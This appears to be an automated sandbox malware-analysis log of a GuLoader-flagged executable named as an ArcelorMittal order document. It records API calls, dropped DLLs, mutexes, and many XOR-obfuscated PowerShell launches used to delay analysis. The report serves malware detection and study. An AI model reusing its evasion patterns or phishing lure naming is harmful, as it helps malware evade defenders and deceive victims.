    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040327D
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2468:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_01
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsu4A62.tmpJump to behavior
    Source: classification engineClassification label: mal68.troj.evad.winEXE@166/5@0/0
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00404591 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404591
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 5356, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Mass process execution to delay analysis
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeWindow / User API: threadDelayed 423Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe TID: 5868Thread sleep time: -42300s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00406375 FindFirstFileW,FindClose,0_2_00406375
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405823
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeAPI call chain: ExitProcess graph end nodegraph_0-5043
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeAPI call chain: ExitProcess graph end nodegraph_0-5046
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
